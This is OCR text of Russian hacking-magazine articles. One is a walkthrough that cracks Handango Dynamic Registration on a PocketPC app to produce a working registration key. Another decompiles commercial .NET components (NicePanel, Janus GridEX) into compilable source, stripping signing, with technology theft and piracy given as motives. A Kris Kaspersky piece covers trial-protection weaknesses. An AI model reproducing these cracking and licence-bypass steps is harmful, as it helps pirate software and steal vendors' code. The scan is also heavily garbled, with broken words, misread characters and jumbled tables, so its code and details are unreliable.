Первая — то, что программа написана с ис- 
пользованием WinCE MFC, о чем говорят строки ти- 
па CString::operator=(char const *) или CWnd__Mes- 
sageBoxW. Это несколько усложняет исследова- 
ние: в отличие от WinAPI, строка представлена не 
просто адресом на данные в памяти, а адресом на 
объект CString, в котором содержится адрес на дан- 
ные в памяти. Соответственно, и операции будут вы- 
полняться над этими объектами: CString::TrimRight. 


Шпаргалка по работе с IDA и е\С-отладчиком 


IDA evc 
Запустить 152) F5 
Остановить CTRL+F2 SHIFT+F5 
Прервать — — 
Шаг со входом F7 F141 
Шаг без входа F8 F10 
Шаг с выходом CTRL+F7 SHIFT+F11 
До курсора F4 SHIFT+F10 
Breakpoint F2 FQ 


Перейти на адрес в нужном окне 


нажать @ и ввести адрес 


выделить и перетащить адрес на нужное окно 
или нажать CTRL+G и ввести адрес 


Вторая вещь — это таймер. Здесь нужно обратить 
внимание на параметр IpTimerFunc, установлен- 
ный в NULL. Это говорит об отсутствии специаль- 
ного обработчика, то есть через 500 мс будет сге- 
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формирование строки ВРМ в памяти 
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нерировано событие \\/М_ТИМЕВ, которое должно 
быть перехвачено и обработано либо внутри MES- 
ЗАСЕ_МАР (для МЕС), либо внутри основной функ- 
ции окна (для WinAPI). 

Изучим код по адресу loc_291DC, куда ocy- 
ществляется безусловный локальный переход. 
С некоторого адреса в ВЗ загружается флаг, его 
проверка на равенство нулю создает еще одно 
ветвление. Если этот флаг не равен нулю, то окно 
регистрации разблокируется, а таймер остана- 
вливается и затем принимается решение об ус- 
пешной регистрации. Если же ВЗ равен единице, 
происходит вызов функции по адресу 29594. 

По адресу 29594 находится функция приема 
и передачи сообщений. Таким образом, флаг, загру- 
жаемый в ВЗ, определяет, пуста ли очередь сообще- 
ний. Если она не пуста, вызов функции продолжает- 
ся в цикле снова, пока не будет выставлена единица. 

GetMessageW в качестве одного из параме- 
тров принимает структуру MSG, содержащую в се- 
бе параметр message (он определяет, какое именно 
сообщение было передано). Установка breakpoint 
на адрес 29580 позволяет перехватить несколько 
сообщений, имеющих следующие идентификато- 
ры: OxOF, 0x0113. Смысл этих сообщений поможет 
понять файл winuser.h, обычно он лежит в папке 
\Include\Armv4 (при установленном Pocket РС 2003 
SDK). Ищем полученные коды и находим события: 


После GetMessageW идет вызов DispatchMessa- 
geW, который по идее должен привести к обра- 
ботчику сообщения. Но отладчики не дают отла- 
живать системные библиотеки. Как же узнать ад- 
рес функции обработчика? Наверное, способов 
не так много, но, естественно, все из них очень 
трудоемкие, поскольку подразумевают долгие по- 
иски. Впрочем, лень — двигатель прогресса, так 
что для начала изучим содержимое Strings Win- 
dow. Вдруг попадется что-то интересное? И дей- 
ствительно, внимание должна привлечь следую- 
щая строка: 


Да это же как раз Handango Dynamic Registration! 
Для того чтобы узнать, где и как используется эта 
строка, снова воспользуемся перекрестными ссы- 
лками (XREF). Итак, сначала дважды щелкнем по 
этой строке в окне Strings window, в результате 
попадаем в секцию .text. Теперь переходим по 
ссылке «DATA XREF: зи6_1САВ4:оН_1003С», 3a- 
тем no «DATA XREF: sub_1CAB4+53C». 

> может быть, простое везение, а быть мо- 
жет, недосмотр автора привел нас к вот этому 
блоку кода (смотри «Формирование строки RPN 
в памяти»). 

С помощью функции calloc выделяется чи- 
стый блок памяти, затем (при использовании най- 
денной выше строки в качестве формата) функ- 
цией swprintf B этом блоке формируется RPN. 

Установим breakpoint на адрес 1CFFC и за- 
пустим отладчик. После остановки можно изучить 
передаваемые параметры. Вот они: 


Ghar *butter — 92090 
на пустое место] 
Const Chem “format — 


[указатель 


“Su = key * с 5 
+ key i << +" 
[1463] 


а а В 
argument 1 — 0x05B7 
enqumenty 2 aoe 


Чтобы увидеть результат (а именно, готовую RPN), 
необходимо перейти в память по адресу 92090 
и выполнить функцию swprintt. 

Кажется, теперь все необходимые ингреди- 
енты для генерации ключа известны. Так что мож- 
но отключить все breakpoints и на этой радужной 
ноте закончить исследовательскую часть. 


предварительное 
исследование 
с использованием КПК 


Все программы из обзора лежат на диске 


CERegSpy 
www.forwardiab.com 
Любая уважающая себя программа не может 
не записать чего-нибудь в реестр, тем более 
введенный регистрационный ключ или trial’ Hb 
счетчик. Хорошо бы знать, к каким ключам 
происходит обращение и какая информация 
при этом передается. Нам как раз поможет 
утилита CERegSpy, которая занимается мони- 
торингом АР! обращений к реестру. 

Нажимаем «start», запускаем исследуемую 
программу, закрываем ee, жмем «stop» и изу- 
чаем перехваченные обращения. Все просто. 
Еще утилита позволяет 
выбирать функции, ко- 
торые необходимо пе- 
рехватывать, что очень 
удобно для отсеивания 
лишнего. 


Handango 
Dynamic Registration 


HANDAGO ЗАНИМАЕТСЯ ПРОДАЖЕЙ ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ РАЗЛИЧНЫХ ПРОИЗ- 
ВОДИТЕЛЕЙ (НАПРИМЕР RESCO), ПРЕДЛАГАЯ ПОСТАВЩИКАМ ЗАЩИТИТЬ ПРОДУКТЫ С ПО- 
МОЩЬЮ СОБСТВЕННОЙ РАЗРАБОТКИ КОМПАНИИ — HANDANGO DYNAMIC REGISTRATION, 
КОТОРАЯ ПРЕДСТАВЛЯЕТ СОБОЙ АЛГОРИТМ ГЕНЕРАЦИИ КЛЮЧА С ИСПОЛЬЗОВАНИЕМ 
АРМ (ОБРАТНОЙ ПОЛЬСКОЙ ЗАПИСИ). В ТЕ ДАЛЕКИЕ ВРЕМЕНА, КОГДА ЭВМ БЫЛИ БОЛЬ- 
ШИМИ, ЭТА ФОРМА ЗАПИСИ БЫЛА БОЛЕЕ ИЗВЕСТНА В КРУГАХ ПРОГРАММИСТОВ, 
ПОСКОЛЬКУ ОНА ПОЗВОЛЯЕТ ЗАПИСАТЬ ЛЮБУЮ МАТЕМАТИЧЕСКУЮ ФОРМУЛУ ТАКИМ 
ОБРАЗОМ, ЧТОБЫ ЭВМ СМОГЛА ПРОЧИТАТЬ И ВЫПОЛНИТЬ ЕЕ ЗА ОДИН ПРОХОД, БЕЗ 
ВОЗВРАТОВ. НАПРИМЕР, У НАС ЕСТЬ ФОРМУЛА (((! == 0) * 123) + KEY) + (С * 4). СНАЧАЛА 
ВЫПОЛНИТСЯ ДЕЙСТВИЕ |==0, ПОТОМ (1==0) * 123, ЗАТЕМ ((I == 0) * 123) + KEY, ДАЛЕЕ С * 4. 
НАКОНЕЦ, (((| == 0) * 123) + KEY) + (С * 4). ВРМ ТРЕБУЕТ, ЧТОБЫ СНАЧАЛА БЫЛИ ЗАПИСАНЫ 
ОПЕРАНДЫ, А ПОТОМ — САМА ОПЕРАЦИЯ. ТОГДА НАША ФОРМУЛА БУДЕТ ВЫГЛЯДЕТЬ ТАК: 
10 == 123 * КЕУ+С4* + 


АЛГОРИТМ HANDAGOO ИСПОЛЬЗУЕТ ДЛЯ ГЕНЕРАЦИИ КЛЮЧА СЛЕДУЮЩИЙ ПРИНЦИП. 

ДЛЯ КАЖДОЙ БУКВЫ ИМЕНИ (OWNER) ВЫЗЫВАЕТСЯ ФУНКЦИЯ KEY = F(C,I,KEY), ГДЕ KEY — 
КЛЮЧ, ПЕРЕДАЮЩИЙСЯ НА СЛЕДУЮЩИЙ ШАГ, С — ТЕКУЩАЯ ДЛЯ ДАННОГО ШАГА БУКВА 
ИМЕНИ, | — ПОЗИЦИЯ ЭТОЙ БУКВЫ, A F() — СОБСТВЕННО ФУНКЦИЯ, РЕАЛИЗУЮЩАЯ ВРМ. 
ПО ОКОНЧАНИИ РАБОТЫ ПЕРЕМЕННАЯ КЕУ ДОЛЖНА СОДЕРЖАТЬ ПЯТИЗНАЧНЫЙ КЛЮЧ, 
СООТВЕТСТВУЮЩИЙ ВВЕДЕННОМУ ИМЕНИ. ПОДРОБНО АЛГОРИТМ РАБОТЫ РАССМОТРЕН 


НА ОФИЦИАЛЬНОМ САЙТЕ HANDAGOO ДЛЯ РАЗРАБОТЧИКОВ (http/developer.handango.com/ 
developerinformation.jsp?siteid=1 &jid=e5fe799f7x8c843f8565efc72776d3ac&ckey-dev_dynamicregistration& pageid=6) E 


> теперь, зная RPN и Owner, перейдем на 
страничку тестирования (http:/developer.handango.com/Reg- 
Code.jsp) и там введем данные в соответствующие по- 
ля. Итак, смотрим: 


Owner: Getorix 
REN: 1463 1 (key * с 5% = 2 
Нажимаем кнопку Calculate Registration 


+ key i << + 


Code и получаем: 
The Registration Code for this user 
will be: 19539 


Убираем breakpoints, запускаем программу в нор- 
мальном режиме и пытаемся зарегистрироваться 
с полученным ключом. «Thank you for registering 
our product», — говорит Lexisgoo. 

> на посошок можно сказать, что Handango 
Dynamic Registration очень распространена среди 


SKTracker 
http://s-k-tools.com 


Эта программа позволяет отследить изменения, произошедшие Ha КПК. Снача- 
ла мы записываем текущее состояние файловой системы, системного реестра 
или системных БД, потом, после операций с подопытным приложением, снова 
записываем текущее состояние и сравниваем полученное. Также из окна прос- 
мотра можно запустить файловый менеджер или редактор реестра, удалить но- 
вые файлы и ключи реестра, экспортировать данные в текстовый файл. 


PEinfo 


http://s-k.al.ru/wincepdaru.html 
Как видно из названия, 


основное назначение 
программы — показы- 
вать содержимое РЕ-пеа- 
der исполняемых файлов, 
но разработчики пошли 
дальше и добавили воз- 
можность просматривать 
и редактировать Нех-код, 
ресурсы и многое другое — 
полноценный редактор 
исполняемого файла. 


программ для PocketPC, но, как можно было убе- 
диться, она не создает надежной защиты. Количе- 
CTBO «исследователей» РоскеРС-программ растет с 
каждым днем, и можно только удивляться авторам, 
которые используют эту защиту, и, тем самым, не 
торопятся обезопасить свой программный продукт. 

Приложив совсем немного усилий, можно 
сделать эту защиту не такой уж и податливой. Для 
начала надо сделать так, чтобы строка ВРМ не 
хранилась в секциях кода, данных или ресурсов 
целиком, — лучше написать функцию ее восста- 
новления в памяти из мусора. Станет еще лучше, 
если вообще не восстанавливать ее в памяти, 
а передавать по кусочкам алгоритму генерации. 
Заверяю: одно это намного затруднит разбор, 
а сколько всего еще можно придумать! № 
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SKHexEd 


http://s-k-tools.com 

Наверное, лучший НЕХ-редактор для КПК. 
Позволяет не только просматривать и редакти- 
ровать бинарные файлы, но и производить поиск 
в режимах hex, ascii, un- 
icode, выделять блоки 
подсветкой, сравнивать 
файлы с сохранением 
результата, конверти- 
ровать значения и на- 
страивать системные 
шрифты. 
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мы Взломы и настройка 
взлом LINUX. 100 профес- 
сиональных советов 


и инструментов 


М.: Издательство ЭКОМ, 2006 
Фликенгер Р. / 288 страниц 
Разумная цена: 164 рубля 


Набор разнокалиберных по- 

лезных советов (и простых, 
и сложных) по наболевшим проблемам на 
серверах под управлением Linux. Правда, сло- 
во «взломы» употреблено в названии в очень 
переносном смысле. Видимо, автор решил 
сыграть на интересе людей к взлому. На са- 
мом деле в книге описаны: эффективное 
управление серверами под Linux, контроль 
версий, резервное копирование, советы и хит- 
рости по работе с Сетью, мониторинг систем- 
ных и сетевых ресурсов, использование SSH, 
написание собственных сценариев, настрой- 
ка и использование Bind 9, MySQL и Apache. 
В общем, микс актуального и полезного. 


Wi-cby: «боевые» 
приемы взлома 

и защиты 
беспроводных сетей 


М.: НТ Пресс, 2005 
Владимиров А.А. / 463 страницы 
Разумная цена: 335 рублей 


Методы атак на беспровод- 
ные сети Wi-Fi uv защита от 
них в одном флаконе. Обсуждается подбор 
аппаратных и программных средств для 
атаки и защиты. По шагам (!) расписаны 
различные атаки: взлом WEP, атака FMS, 
фальшивые точки доступа и DoS-ataku. 
Здесь же все слабости разрабатываемых 
протоколов безопасности, включая 802.111, 
РРТР и IPSec. Описаны инструменты для 
обнаружения сети в режиме мониторинга и 
анализа трафика (Kismet, Wellenreiter, Airtraf, 
Gtkskan, Airfart, Mognet, WifiScanner), сис- 
темы обнаружения вторжений и способы 3a- 
щиты (криптографическая, аутентифика- 
ция, VPN). Единственный минус: содержи- 
мое книжки поймет только тот, кто в теме. 


Хакинг операционных 
систем Microsoft Win- 
dows XP и Linux He 
для дилетантов 


М.: ЗАО «Новый издательский 
дом», 2005 / Леонтьев Б.К. / 
320 страниц 

Разумная цена: 155 рублей 


В названии значатся ХР 

и Linux, но солидная часть 
ее отдана работе с VMware Workstation. Это 
приложение эмулирует полнофункциональ- 
ный компьютер с его аппаратной «начинкой». 
Каждый такой «компьютер» — виртуальная 
машина, ей управляет ОС, скажем ХР или 
Linux. Пригодится, если вздумаешь запус- 
тить несколько операционок одновременно 
и работать в спарке. «Остаток» книги — 
важные моменты установки, настройки 

и работы в ХР и Linux. Можешь читать как 
раз используя VMware Workstation. 


.МЕТ секретам 


ДОБЫЧА ИСХОДНОГО КОДА ПРИЛОЖЕНИЙ 


ЭТА СТАТЬЯ ПОСВЯЩАЕТСЯ ТЕХНИКЕ ВОССТАНОВЛЕНИЯ ИСХОДНОГО КОДА .МЕТ- 
ПРОГРАММ. РАЗБЕРЕМ И ПРОБЛЕМЫ, ВОЗНИКАЮЩИЕ ПОСЛЕ ВОССТАНОВЛЕНИЯ 
ИСХОДНОГО КОДА, — НЕРЕДКО ВОССТАНОВЛЕННЫЙ КОД ИМЕЕТ ОШИБКИ КОМ- 
ПИЛЯЦИИ. В МОИХ СТАТЬЯХ (СМОТРИ В ПРЕДЫДУЩЕМ СПЕЦЕ) ОБ ЭТОМ УПОМИ- 


НАЕТСЯ |NIMUNT3 TEAM)(NIM@INT3.RU) 


Зачем нужно восстанавливать исходный код? 
Есть две основные причины. Первая — это про- 
мышленный шпионаж. К примеру, на мировом 
рынке имеется около десятка компаний, произво- 
дящих Grid control. На сегодняшний день три-че- 
тыре компании, то есть тройка лидеров, активно 
борются за покупателей, привнося в свой Grid 
control что-то новое. Если ноу-хау начинает поль- 
зоваться успехом и один из конкурентов получает 
серьезные преимущества на этом рынке, то и воз- 
никает ситуация, которая соблазняет конкурентов 
проникнуть в дебри технологии, чтобы внедрить 
ее в свой продукт. 

Итак, первая причина — это восстановление 
исходного кода для кражи технологий. 

Вторая причина — кража самого продукта 
ради уклонения от его оплаты. На данный мо- 
мент мораль басни такова, что, поменяв назва- 
ния классов и патезрасе'ов, можно с легкостью 
утверждать: «Компонент был написан кем-то 
другим ;). Настоящие разработчики не смогут 
доказать своих авторских прав». И почему же 
существуют эти причины? Если отбросить эти- 
ческую и законную стороны вопроса, придем к 
выводу о том, что кража чужого труда приносит 


большую экономическую выгоду — экономим 
время и деньги. Конечно, мы с тобой — не сто- 
ронники незаконных дел, поэтому будем знако- 
миться с данной технологией в чисто образова- 
тельных целях. 

> — восстановление исходного кода достигается 
благодаря анализу исполняемого файла. Цель 
анализа — найти языковые конструкции исходно- 
го кода, характерные для данного участка испол- 
няемого кода (так называемая технология «деком- 
пиляция»). Однако декомпиляция обычно идет в 
два прохода. При первом происходит дизассем- 
блирование анализатора — чтобы первоначально 
разобрать исполняемый файл и составить струк- 
туры для дальнейшего анализа кода. Дизассем- 
блирование — это перевод исполняемого кода в 
код неких абстрактных команд. Не смешивать по- 
нятия дизассемблирования и декомпиляции! 
В .МЕТ дизассемблирование выдает листинг IL-Ko- 
манд, а декомпиляция — исходный код на одном 
из .МЕТ-языков высокого уровня (ЯВУ). 


Посмотрим, как обычно происходит декомпиля- 
ция. Для этого воспользуемся Reflector’om (www.ai- 
sto.com/roeder/dotnet) и плагином Reflector.FileDisas- 
sembler (www.denisbauer.com/NETTools) который позво- 
ляет сохранять классы в отдельные файлы, кон- 
вертировать ресурсы в формат *.гезх и создавать 
файл проекта. 

> — первым примером восстановления исходно- 
го кода выступит замечательный красивый кон- 
Tpon тсерапе!. Его можно скачать с Www.purecom- 
ponents.com/products/nicepanel Будем декомпилиро- 
вать его в С#, поскольку на нем он и был напи- 
сан. Декомпилировать в другой ЯВУ как-то про- 
блематично, так как существует разница в син- 
таксических конструкциях языков. Например, в 
VB.Net не учитывается регистр символов имени 
классов, методов и т.д., а в С# одинаковые бу- 
квы в разных регистрах считаются разными наз- 
ваниями. Reflector не учитывает этого, поэтому 
при декомпиляции С#'ного кода в VB.Net мы по- 
лучим кучу ошибок. 

Первая ошибка, которую выдал компиля- 
тор: PureComponents.NicePanel.Design\Action- 
MenuNative.cs(249): Небезопасный код может 
использоваться только при компиляции с пара- 
метром /unsafe. 

В компоненте используются небезопасные 
конструкции, применяющие указатели. Как из- 
вестно, указатели могут указывать Ha нераспре- 
деленную память или указывать совсем не туда, 
куда должен. Соответствующая ошибка про- 
граммирования (в использовании указателей) 
довольно распространена, поэтому в .МЕТ оста- 
вили лишь поддержку этой возможности (для 
случаев, где без указателей нельзя решить по- 
ставленную задачу). 

Итак, нужно зайти в опции проекта и уста- 
новить параметр Allow Unsafe Code Blocks = True. 
Затем еще раз делаем buid и видим, что компи- 
лятор выдал 58 ошибок. 


Начнем с проблемы, которая ждала нас в методе 
PureComponents.NicePanel.NicePanel::OnPaint- 
Background(PaintEventArgs pevent). Компилятор 
сообщает об ошибке 


с$ (416): 
применяться к операндам типа 'РагеСоп- 
ponents.NicePanel.PanelHeaderSize' 


Оператор '+' не может 


и 'PureComponents.NicePanel .PanelHeaderSize' 


Посмотрев на PanelHeaderSize, обнаруживаем, 
что это епит (перечисление). 


public enum PanelHeaderSize 
{ 


Large = 40, 
Medium = 24, 
Small = 16 


} 


Вот уже становится понятно, что должно происхо- 
дить сложение элементов перечисления, для чего 
в С# используется оператор (|). Заменив (+) на (I), 
мы избавляемся от девяти ошибок. Аналогичная 
ошибка есть в методе 


PureComponents.NicePanel .Design.NicePan- 
elDesigner: :OnRemoveAutoScrollPanel (ob- 
ject sender, EventArgs e). 


В этом же классе компилятор ругается в методе 


OnAddAutoScrollPanel (object sender, 
EventArgs е) строка 345: Оператор '-' 
не может применяться к операндам типа 
‘int' и 'PureComponents.NicePanel.Pan- 
elHeaderSize'. 


Вот как раз эта строка: 


(int) (((( (PanelHeader- 
Size)this.m_NicePanel.Height) - 


panell.Height = 


this.m_NicePanel.Style.HeaderStyle.Size) 
- this.m_NicePanel.Style.FooterStyle.Si- 
ze) - ((PanelHeaderSize)2)); 
Рассмотрим эту строку кода поближе. Во-первых, 
внимательно приглядываемся к приведению типа 
int k типу PanelHeaderSize: (PanelHeaderSize)this.m_Ni- 
cePanel.Height. При этом происходит выравнивание к 
ближайшему элементу в перечислении PanelHeader- 
Size. К примеру, если Height будет равен 19-ти, то 
это преобразование округлит до PanelHeaderSize. 
Small(16). Если Height будет равен 21-my, преобра- 
зование округлит до PanelHeaderSize.Medium (24). 
Таким преобразованием автор добился дис- 
кретности размера некоего окна, и поэтому раз- 
мер окна в любом случае будет только одним из 
трех (40, 24, 16). В чем суть ошибки? Когда два 
епит'а участвуют в разности, результат автома- 
тически преобразуется в тип int, и уже при сле- 
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дующем вычитании получается, что из объекта с 
типом int вычитается объект с типом PanelHeader- 
Size. Компилятор же видит несоответствие типов 
и выдает нам ошибку компиляции. Следователь- 
но, для решения проблемы каждая разность дол- 
жна быть выделена в отдельные скобки и резуль- 
тат разности должен быть приведен к типу Ра- 
пеНеадег те. 

Жаль, но Reflector не учитывает эту особен- 
ность. Если есть время, можешь написать Аисту 
баг-репорт :). В результате эта строка кода дол- 
жна выглядеть так: 
panell.Height = (int) ((PanelHeaderSi- 
ze) ((PanelHeaderSize) ( (PanelHeaderSi- 
ze) ((PanelHeaderSize) this.m_NicePan 
el.Height) - this.m_NicePanel.Style.He- 
aderStyle.Size) 
le.FooterStyle.Size) - 
pas) 2))))3 


- this.m_NicePanel.Sty- 
( (PanelHeaderSi- 


Остаются еще две проблемы, связанные с этим 
несчастным перечислением :). Компилятор со- 
общает: 


PureComponents.NicePanel\NicePanel.cs: 
Оператор '/' 
к операндам типа 'PureComponents.Nice- 
Panel.PanelHeaderSize' и 'PureCom- 


не может применяться 


ponents.NicePanel.PanelHeaderSize' 


Это происходит в строках 1704 и 1900. Вот пра- 
вильный вид этих строк — первая: 


int num2 = (int) (PanelHeaderSi- 
ze) ((((PanelHeaderSize) (this.Height - 
numl)) - this.Style.FooterStyle.Size) 


+ ((int)this.Style.FooterStyle.Size / 2)); 


И вторая: 

int num3 = (int) (((PanelHeaderSize) 
numl) + ((this.Style.HeaderStyle.Size - 
((PanelHeaderSize) 2)) / 2)); 


Далее следуют более каверзные ошибки (синтак- 
сические). Например, в классе NicePanelDesigner 
строка 135: 


if (<PrivateImplementationDeta- 
ils>.$$method0x60000d2-1 == null) 


Тут запрятались сразу несколько ошибок. Знаки 
(>), ($) и (-) не могут использоваться в названиях 
методов, классов и т.д. Открыв эту сборку в Вейес- 
tor’e, обнаружим, что метод $$method0x60000d2-1 
действительно существует: кликнем на название это- 
го метода и попадем в интересный класс. 


internal class <PrivateImplementation- 
Details> 
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Этот класс находится в пространстве имен ("-"), 
которое создается компилятором автоматически, 
в него входят глобальные поля, методы и классы, 
что, правда, не поддерживается в С# и наводит на 
мысли о присутствии некого защитного механиз- 
ма. Кстати, из этого класса в проекте использует- 
ся только одно поле $$method0x60000d2-1. 


Чтобы исправить глюки, создадим класс Helper, а 
в нем — одно поле. Еще подправим все обраще- 
ния к нему в строках 228, 148 и 135. 


И последняя ошибка, которая должна быть испра- 
влена: 


Этот закрытый ключ использован для цифровой под- 
писи данного компонента. Чтобы исправить неприят- 
ность, заходим в файл Assemblylnfo.cs и смотрим на 
всякие атрибуты сборки, среди которых указаны: 


и т.д. Можно заменить значения этих параметров 
на свои или совсем удалить их. Вот уже мы доби- 
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PureComponents NicePanel Browser 


лись компилируемости декомпилированных ис- 
ходников, теперь проверим их работоспособность ;). 

Добавляем в Solution любой из примеров, 
поставляемых вместе с компонентом (я предпо- 
чел Showcase — он более наглядный и показы- 
вает почти все способности компонента), так что 
если допустим ошибку, симптомы ее присут- 
ствия будут видны. 

Запустив пример, я не увидел никаких про- 

блем, значит, восстановление исходного кода 
можно считать успешным :). 
3» — вторым примером станет Grid-KOMNOHEHT от 
компании Janus (www.janusys.com/controls) Teno KOH- 
трола было обфусцировано, но только в части ко- 
да, помеченной атрибутами доступа private и inter- 
nal. Все ру с-методы и классы остались в первоз- 
данном виде :) — благодаря этому контролу разра- 
ботчики должны видеть нормальные названия 
классов и полей классов. Нам только на руку! 

Первые ошибки, которые попадают в твое 
поле зрения после декомпиляции, — это множе- 
ственные ошибки ресурсов, связанные с тем, что 
декомпилятор создает отдельные папки для каж- 
дого пространства имен, а классы, входящие в 
них, складывает в эти папки, но почему-то он за- 
бывает складывать в них ресурсы. Классы, произ- 
водные от System.Windows.Forms.Control или Sy- 
stem.Windows.Forms.Form, могут иметь свой файл 
ресурса, и он должен располагаться в той же пап- 
ке, где и сам класс. Следовательно, единственное 
оставшееся для нас действие — разложить файлы 
ресурсов в соответствующие папки. Например, 
нужно положить ресурс 


в папку \Janus\Windows\GridEX\EditControls\Calen- 
dar (относительно корневой папки проекта), а сам 
ресурс — переименовать в JNSAB.resx. 

После исправления этих ошибок навалива- 
ется новая куча из них — связанная с обфускаци- 
ей кода. Пример ошибки: private void |(object, 
EventArgs args1). Здесь пропущено название пер- 
вого параметра. Наверное, этот эффект достига- 
ется переименованием названия параметра в 
пробел, а если параметров два — переименова- 
нием в два пробела, и т.д. Такой способ обфуска- 
ции не был известен мне. Сначала я решил ис- 
правлять эти ошибки вручную. Исправил одну — 
вдруг появилось десять таких же. Коварная Stu- 
dio почему-то не показывает все ошибки сразу, а 
выдает их порциями. Складывается такое впе- 
чатление, что они создаются в процессе :). В об- 
щем, в коде сидит не менее пятисот подобных 
ошибок, и править их руками — утомительное де- 
ло. Вот я и решил автоматизировать процесс, на- 
писав макрос. 


ТИ 


| i | ] | ] 


Чтобы вставить этот макрос, воспользуемся меню 
Tools ~ Macros > Macro IDE. Никогда раньше я не 
писал макросы для Studio, поэтому не удивляйся, 
что макрос написан на vb .net — это язык по умол- 
чанию для Масго. 

Собственно, запустив макрос, спокойно ухо- 
ди попить кофе — успеешь к моменту, когда он за- 
кончит свою работу (макрос вставляет названия 
параметров в формате " _ Param" + NumberOfl- 
temParameter). Итак, часть проблем решена, но... 
на смену приходят более коварные ошибки. 
Дело в том, что в Й-коде допускаются методы, ко- 
торые могут быть похожи количеством и одина- 
ковыми типами параметров, но их различие дол- 


+ 
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Ошибки, ошибки, ошибки... 


жно заключаться в типе возвращаемого значе- 
ния. Таких ошибок в коде не меньше, чем из опи- 
санных выше типов. Их решают опять же с помо- 
щью макроса. 

Как и в предыдущем примере, остаются 
только две ошибки, связанные с присутствием 
двух классов в пространстве имен ("-"). Их назва- 
ния — это аи Б. Члены этих классов не использу- 
ются в проекте, поэтому просто исключаем их из 
проекта или удаляем. Наконец-то все ошибки ком- 
пиляции побеждены. Берем пример, поставляе- 
мый с данным компонентом, запускаем его и на- 
блюдаем за тем, что все работает без ошибок. 
>»  работоспособные исходники были восстано- 
влены всего за час. На написание их ушло бы не 
менее двух месяцев. Какой-нибудь злой про- 
граммист наверняка включил бы этот исходный 
код непосредственно в свой проект и обфусци- 
ровал бы его. Не найдется никого, кто был бы в 
состоянии доказать, что «не я» написал эту часть 
программы № 


62 | ЛАБОРАТОРИЯ ВЗЛОМА 


то 


РЕЙТИНГ ОШИБОК 
ЗАЩИТНИКОВ ПРОГРАММ 


р 


СОЗДАТЬ КАЧЕСТВЕННУЮ ЗАЩИТУ ОТ ВЗЛОМА В ОБЩЕМ НЕСЛОЖНО. ДЛЯ ЭТОГО ДАЖЕ НЕ ОБЯЗАТЕЛЬНО 
ЗНАТЬ АССЕМБЛЕР И БЫТЬ «НА ТЫ» С ОПЕРАЦИОННОЙ СИСТЕМОЙ. ПОЧЕМУ ЖЕ ТОГДА ПРОГРАММЫ 
ЛОМАЮТСЯ КОСЯКАМИ? ВО ВСЕМ ВИНОВАТЫ ОШИБКИ РАЗРАБОТЧИКОВ, ИЗБЕЖАТЬ КОТОРЫХ ОЧЕНЬ 
ЛЕГКО, ЕСЛИ, КОНЕЧНО, ЗАРАНЕЕ ЗНАТЬ, ГДЕ САЛО, А ГДЕ КАПКАН [КРИС КАСПЕРСКИ AKA МЫЩЬХ 


Несмотря на разнообразие трюков и приемов, используемых 
создателями защит, большинство программ ломаются по стан- 
дартному набору шаблонов. Ошибки разработчиков удручаю- 
ще однообразны — никакой тебе тяги к творчеству, никакого 
морального удовлетворения от взлома. И вместо интеллекту- 
альной игры и смертельного поединка с защитой взломщикам 
приходится ковыряться в чем-то очень неаппетитном, похожем 


на чей-то наполовину разложившийся труп — останки мертво- 
рожденных идей, надерганных программистами из древних ма- 
нуалов, давно неактуальных. 

>» = некоторые ошибки можно отнести к разряду концептуаль- 
НЫХ, «благодаря» которым программу взломает не только ма- 
терый хакер, но и начинающий крэкер или даже продвинутый 
пользователь. Не давай им шанса! 


смывайте воду 

и выключайте свет 

Для программ, защищенных trial-cpoKoM, 
характерна проблема реинсталляции. 
Когда испытательный период заканчива- 
ется и программа говорит «мяу», средне- 
статистический пользователь, вместо то- 
го чтобы зарегистрироваться, просто уда- 
ляет ее с компьютера и тут же устанавли- 
вает вновь, надеясь, что она заработает 
как новая. Специально для «таких» ин- 
сталлятор оставляет на компьютере се- 
кретный скрытый знак, не удаляемый де- 
инсталлятором. Обнаружив, что програм- 
ма была установлена на этом компьюте- 


ции» типа Advanced Registry Tracer созда- 
ЮТ «слепок» реестра. После установки 
программы создается еще один дамп, ко- 
торый сравнивается с первым. Все тай- 
ное становится явным! Если же первый 
дамп по каким-то причинам не был сде- 
лан (спохватился только после окончания 
trial-cpoka), не беда. Запускай файловый 
монитор вместе с монитором реестра 


Марка Руссиновича (www.sysinternals.com) и 
смотри, что именно «не нравится» защи- 
те, то есть к каким именно потайным 
уголкам она обращается. 

Исход сражения с защитой можно 
предугадать заранее, но можно ли пред- 
отвратить его? Первое (и самое глупое), 
что можно предложить, — гадить в реес- 
тре и файловой системе, оставляя целую 
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ре ранее, защита блокирует запуск и го- 
ворят «мяу» еще раз. На первый взгляд, 
защита кажется неприступной, но... об- 
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наружить и удалить скрытый знак может 
даже ламер! 

Это делается так. Перед установкой 
программы с компьютера снимается пол- 
ный дамп. Антивирусные ревизоры помо- 
гают сформировать список файлов, а 
утилиты «принудительной деинсталля- 
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Монитор реестра позволяет отслеживать скрытые знаки, к которым обращается защи- 


щенная программа 


БОЛЬШИНСТВО ПРОГРАММ 


ЛОМАЮТСЯ ПО ОДН 
И ТОМУ ЖЕ НАБОРУ 


ОМУ 


СТАНДАРТНЫХ ШАБЛОНОВ 


навозную кучу «следов», разгребать ко- 
торую пользователь запарится. Только 
некрасиво это. Какому пользователю 
понравится такая программа? Мотивация 
честной регистрации падает ниже абсо- 
лютного нуля. 

Гораздо элегантнее будет оставить 
едва различимый и совершенно неоче- 
видный след, к примеру, изменив дату 
создания папки %windows%, поместив в 
поле десятых долей секунд свое «магиче- 
ское» число. Да, конечно, мониторы ус- 
пешно отследят эту нехитрую махинацию, 
но, учитывая размер их логов, пользова- 
тель с высокой степенью вероятности 
просто не обратит внимания на эту ме- 
лочь (правда, возникает потенциальный 
конфликт с другими защитами). 

Вотеще один трюк. Создаешь файл, 
делаешь seek на весь размер свободного 
пространства, как бы «втягивая» его 
внутрь себя, затем сканируешь получен- 
ный файл на предмет наличия «своего» 
содержимого. Есть такой хинт: при удале- 
нии файлов с диска они продолжают 
«догнивать» в свободных секторах до- 
вольно длительное время, поэтому защи- 
та может легко и прозрачно обнаружить, 
была ли она установлена на данный диск. 
Для этого совершенно не обязательно 
прибегать к сканированию на уровне сек- 
торов, достаточно просто сделать seek — 
при выделении кластеров операционная 
система не очищает их, что становится 
огромной дырой в безопасности. Конечно, 
крэкер без труда обнаружит и обойдет та- 
кую проверку, но простого пользователя 
она поставит в тупик. Разве что он не вос- 
пользуется специальными утилитами для 
физического удаления файлов, затираю- 
щих их содержимое. Но утилит для физи- 
ческого удаления веток реестра нет... 

Самое надежное — «зашить» дату 
